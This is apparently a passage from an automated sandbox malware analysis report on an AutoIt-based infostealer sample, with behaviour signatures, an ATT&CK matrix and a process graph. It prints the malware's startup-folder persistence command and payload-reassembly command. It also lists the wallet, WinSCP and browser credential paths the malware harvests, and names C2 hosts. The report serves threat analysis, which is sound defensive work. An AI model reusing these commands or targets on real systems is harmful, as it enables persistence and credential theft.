Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\tradehub.url" & echo url="c:\users\user\appdata\local\tradesecure innovations\tradehub.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\tradehub.url" & exit
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\maintains.pub + ..\legislation.pub + ..\blood.pub + ..\document.pub + ..\breaks.pub + ..\both.pub + ..\explicitly.pub + ..\governor.pub + ..\bull.pub + ..\comparison.pub + ..\performing.pub + ..\gate.pub + ..\republican.pub + ..\reverse.pub + ..\thousand.pub + ..\apartments.pub + ..\swingers.pub + ..\urban.pub + ..\robert.pub + ..\regulation.pub + ..\confusion.pub + ..\listening.pub + ..\generating.pub + ..\argentina.pub + ..\amenities.pub + ..\vacation.pub + ..\vampire.pub + ..\trademarks.pub + ..\distinguished.pub + ..\silly.pub + ..\hell.pub + ..\worcester.pub + ..\concept.pub + ..\enlarge.pub + ..\preference.pub + ..\poem.pub mJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\tradehub.url" & echo url="c:\users\user\appdata\local\tradesecure innovations\tradehub.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\tradehub.url" & exitJump to behavior
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_008114AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,23_2_008114AE
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_00811FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,23_2_00811FB0
Source: Seat.com, 0000000E.00000003.942989179.000000000468C000.00000004.00000800.00020000.00000000.sdmp, Seat.com, 0000000E.00000000.932835393.0000000000473000.00000002.00000001.01000000.00000007.sdmp, TradeHub.com, 00000017.00000002.975504925.0000000000873000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: TradeHub.comBinary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_007D0A08 cpuid 23_2_007D0A08
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeQueries volume information: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_0080E5F4 GetLocalTime,23_2_0080E5F4
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_0080E652 GetUserNameW,23_2_0080E652
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_007EBCD2 GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,23_2_007EBCD2
Source: C:\Users\user\Desktop\ADFoyxP.exeCode function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406805
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

barindex
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeKey opened: HKEY_CURRENT_USER\Software\monero-project\monero-core
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2 Override
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\kzpbmws1.default
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\ol7uiqa8.default-release
Source: TradeHub.comBinary or memory string: WIN_81
Source: TradeHub.comBinary or memory string: WIN_XP
Source: TradeHub.com, 00000019.00000000.1076426037.0000000000873000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: TradeHub.comBinary or memory string: WIN_XPe
Source: TradeHub.comBinary or memory string: WIN_VISTA
Source: TradeHub.comBinary or memory string: WIN_7
Source: TradeHub.comBinary or memory string: WIN_8
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_00832263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,23_2_00832263
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_00831C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,23_2_00831C61

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information111
Scripting		2
Valid Accounts		231
Windows Management Instrumentation		111
Scripting		1
Exploitation for Privilege Escalation		11
Disable or Modify Tools		1
OS Credential Dumping		2
System Time Discovery		Remote Services1
Archive Collected Data		2
Ingress Tool Transfer		Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts1
Native API		1
DLL Side-Loading		1
DLL Side-Loading		1
Deobfuscate/Decode Files or Information		21
Input Capture		1
Network Service Discovery		Remote Desktop Protocol1
Data from Local System		11
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Command and Scripting Interpreter		2
Valid Accounts		1
Extra Window Memory Injection		2
Obfuscated Files or Information		1
Credentials in Registry		1
Account Discovery		SMB/Windows Admin Shares21
Input Capture		1
Non-Standard Port		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts1
Scheduled Task/Job		1
Scheduled Task/Job		2
Valid Accounts		1
Software Packing		NTDS3
File and Directory Discovery		Distributed Component Object Model3
Clipboard Data		3
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud Accounts2
PowerShell		2
Registry Run Keys / Startup Folder		21
Access Token Manipulation		1
DLL Side-Loading		LSA Secrets410
System Information Discovery		SSHKeylogging4
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts512
Process Injection		1
Extra Window Memory Injection		Cached Domain Credentials1
Query Registry		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
Scheduled Task/Job		113
Masquerading		DCSync251
Security Software Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job2
Registry Run Keys / Startup Folder		2
Valid Accounts		Proc Filesystem161
Virtualization/Sandbox Evasion		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt161
Virtualization/Sandbox Evasion		/etc/passwd and /etc/shadow5
Process Discovery		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
Access Token Manipulation		Network Sniffing11
Application Window Discovery		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd512
Process Injection		Input Capture1
System Owner/User Discovery		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1631942 Sample: ADFoyxP.exe Startdate: 07/03/2025 Architecture: WINDOWS Score: 100 115 ZuYwLYOGpsYmohRivNRzySjfrEDfR.ZuYwLYOGpsYmohRivNRzySjfrEDfR 2->115 117 www-msn-com.a-0003.a-msedge.net 2->117 119 17 other IPs or domains 2->119 135 Suricata IDS alerts for network traffic 2->135 137 Multi AV Scanner detection for submitted file 2->137 139 Sigma detected: Search for Antivirus process 2->139 141 7 other signatures 2->141 14 ADFoyxP.exe 53 2->14         started        18 msedge.exe 2->18         started        20 wscript.exe 1 2->20         started        22 wscript.exe 2->22         started        signatures3 process4 file5 103 C:\Users\user\AppData\Local\...\Worcester.pub, data 14->103 dropped 105 C:\Users\user\AppData\Local\...\Vampire.pub, data 14->105 dropped 107 C:\Users\user\AppData\Local\...\Vacation.pub, data 14->107 dropped 109 34 other malicious files 14->109 dropped 175 Writes many files with high entropy 14->175 24 cmd.exe 2 14->24         started        177 Maps a DLL or memory area into another process 18->177 28 msedge.exe 18->28         started        31 identity_helper.exe 18->31         started        33 identity_helper.exe 18->33         started        179 Windows Scripting host queries suspicious COM object (likely to drop second stage) 20->179 35 TradeHub.com 20->35         started        37 TradeHub.com 22->37         started        signatures6 process7 dnsIp8 101 C:\Users\user\AppData\Local\Temp\...\Seat.com, PE32 24->101 dropped 165 Suspicious powershell command line found 24->165 167 Bypasses PowerShell execution policy 24->167 169 Drops PE files with a suspicious file extension 24->169 171 2 other signatures 24->171 39 Seat.com 5 24->39         started        43 cmd.exe 2 24->43         started        45 cmd.exe 1 24->45         started        47 10 other processes 24->47 129 13.107.42.14, 443, 59576 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 28->129 131 13.89.178.26, 443, 50473, 55445 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 28->131 133 20 other IPs or domains 28->133 file9 signatures10 process11 file12 91 C:\Users\user\AppData\Local\...\TradeHub.com, PE32 39->91 dropped 93 C:\Users\user\AppData\Local\...\RegAsm.exe, PE32 39->93 dropped 95 C:\Users\user\AppData\Local\...\TradeHub.js, ASCII 39->95 dropped 97 C:\Users\user\AppData\Local\...\F, data 39->97 dropped 149 Drops PE files with a suspicious file extension 39->149 151 Writes to foreign memory regions 39->151 153 Writes many files with high entropy 39->153 155 Injects a PE file into a foreign processes 39->155 49 RegAsm.exe 39->49         started        54 cmd.exe 2 39->54         started        56 cmd.exe 1 39->56         started        99 C:\Users\user\AppData\Local\Temp\353090\m, data 43->99 dropped signatures13 process14 dnsIp15 113 45.95.18.173, 4449, 49722, 49724 SHOCK-1US Netherlands 49->113 85 C:\Users\user\AppData\Local\...\curcuma.exe, PE32+ 49->85 dropped 87 C:\Users\...\77EC63BDA74BD0D0E0426DC8F8008506, Microsoft 49->87 dropped 143 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 49->143 145 Writes many files with high entropy 49->145 147 Queries memory information (via WMI often done to detect virtual machines) 49->147 58 cmd.exe 49->58         started        89 C:\Users\user\AppData\...\TradeHub.url, MS 54->89 dropped 61 conhost.exe 54->61         started        63 conhost.exe 56->63         started        65 schtasks.exe 1 56->65         started        file16 signatures17 process18 signatures19 173 Suspicious powershell command line found 58->173 67 powershell.exe 58->67         started        69 conhost.exe 58->69         started        process20 process21 71 curcuma.exe 67->71         started        dnsIp22 121 elevated-outcomes.shop 104.21.96.1, 443, 49725, 49726 CLOUDFLARENETUS United States 71->121 157 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 71->157 159 Found strings related to Crypto-Mining 71->159 161 Tries to harvest and steal browser information (history, passwords, etc) 71->161 163 3 other signatures 71->163 75 chrome.exe 71->75         started        78 msedge.exe 71->78         started        signatures23 process24 dnsIp25 123 192.168.11.20, 137, 138, 1900 unknown unknown 75->123 125 192.168.11.10 unknown unknown 75->125 127 239.255.255.250, 1900 unknown Reserved 75->127 80 chrome.exe 75->80         started        83 msedge.exe 78->83         started        process26 dnsIp27 111 www.google.com 142.250.191.36, 443, 49731, 49732 GOOGLEUS United States 80->111

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.